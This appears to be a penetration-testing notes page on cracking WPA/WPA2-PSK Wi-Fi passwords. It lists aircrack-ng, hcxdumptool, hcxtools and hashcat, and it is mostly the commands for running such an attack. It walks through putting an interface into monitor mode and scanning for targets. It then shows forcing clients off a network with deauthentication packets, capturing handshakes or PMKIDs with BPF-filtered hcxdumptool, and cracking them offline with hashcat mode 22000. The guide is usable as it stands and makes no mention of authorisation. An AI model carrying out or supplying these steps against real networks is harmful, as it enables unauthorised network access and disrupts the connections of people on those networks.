Wireless

Tools

  • Aircrack - Main tool for recon and grabbing handshakes

  • Hcxdumptool - Main tool for obtaining PMKID and EAPOL M1M2M3 or EAPOL M1M2M3M4 auth

  • Hcxtools - Used to converting .cap, .pcap, and .pcapng files into a hashcat readable format.

  • Hashcat - For cracking hashes


Handshake/PMKID

Aircrack

Verify the interface wlan0 is up and ready

iwconfig

Put interface into monitor mode

sudo airmon-ng start wlan0

Start Scanning and performing recon, Taking note of: The channel #. This is needed if there is only one AP on the single channel. If there are multiple under different channel, this is not needed. The AUTH section. PSK(Pre-shared key) means we can obtain a handshake for offline cracking. MGT means it is configured for WPA-Enterprise The Stations below to see if any clients are connected to our target. This may not 100% show all connected clients.

sudo airodump-ng wlan0mon

*For 5GHz networks

sudo airodump-ng wlan1mon -b a

*For all networks (2.5GHz and 5GHz) - Note this can take longer as it sniffs multiple bands.

sudo airodump-ng wlan1mon -b abg

Focus on Targe ESSID(s) and save to a file (be sure to add the band with -b if sniffing on on 5GHz or both)

sudo airodump-ng wlan0mon -c CH# --essid "SSID" -w outfile

Obtain handshake - either wait for someone to connet to the AP from their device OR force a deauth. Using a second terminal window/tab: To deauth anything from the network

sudo aireplay-ng -0 10 -a BSSID wlan0mon

If we choose a client to deauth it will be the same but with the client MAC(station)

sudo aireplay-ng -0 10 -a BSSID -c STATION wlan0mon

We can see if a Handshake obtained by checking the top right of our airodump screen

Once we have our handshake, we can stop airodump with ctrl+c.


HCXDumptool

This may depends on which version you have installed. Eg. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up to date (currently v.6.3.5)

This attack is not guaranteed!!. Not all access points(APs) are vulnerable to the PMKID attack, BUT this can still obtain us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.

Legend

  • R = + AP display : AP is in TX range or under attack

  • 1 = + AP display : got EAPOL M1 (CHALLENGE)

  • 3 = + AP display : got EAPOL M1M2M3 or EAPOL M1M2M3M4 (AUTHORIZATION) - hashcat / JtR can work on

  • P = + AP display : got PMKID - hashcat / JtR can work on

  • S = + AP display : AUTHENTICATION KEY MANAGEMENT PSK


  • E = + CLIENT display : got EAP-START MESSAGE

  • 2 = + CLIENT display : got EAPOL M1M2 (ROGUE CHALLENGE) - hashcat / JtR can work on

Scan for PMKID

Put interface into monitor mode

sudo airmon-ng start wlan0

Find the BSSID of our target with some recon using airodump

sudo airodump-ng wlan0mon

Once we have the BSSID, put it into a Berkeley Packet Filter (BPF) .bpf file.

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf

OR

hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf

** NOTE: We can attack multiple APs with:

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf

OR

hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf
sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan0mon -w outfile.pcapng

After a while we may see the + under the 3 or P of our target. Both of which can be used to obain the password with hashcat. (Unable to get a PMKID in the demo environment sadly.)

When we see the + under the 3 or P of our target, stop hcxdumptool with ctrl+c


Crack it with hashcat

Convert the file to a hashcat format. The output will look the same regardless of which file extensiton it is.

  • .cap file converstion to Hashcat format.

sudo hcxpcapngtool -o SSIDHash outfile.cap
  • .pcapng file conversion to hashcat format

sudo hcxpcapngtool -o SSIDHash outfile.pcapng

Use hashcat with mode 22000 and a wordlist. Try different wordlists and rules.

sudo hashcat -m 22000 SSIDHash wordlist

We can also run the above command with --show to show the password.

sudo hashcat -m 22000 SSIDHash wordlist --show

Captive Portals

COMING SOON

Last updated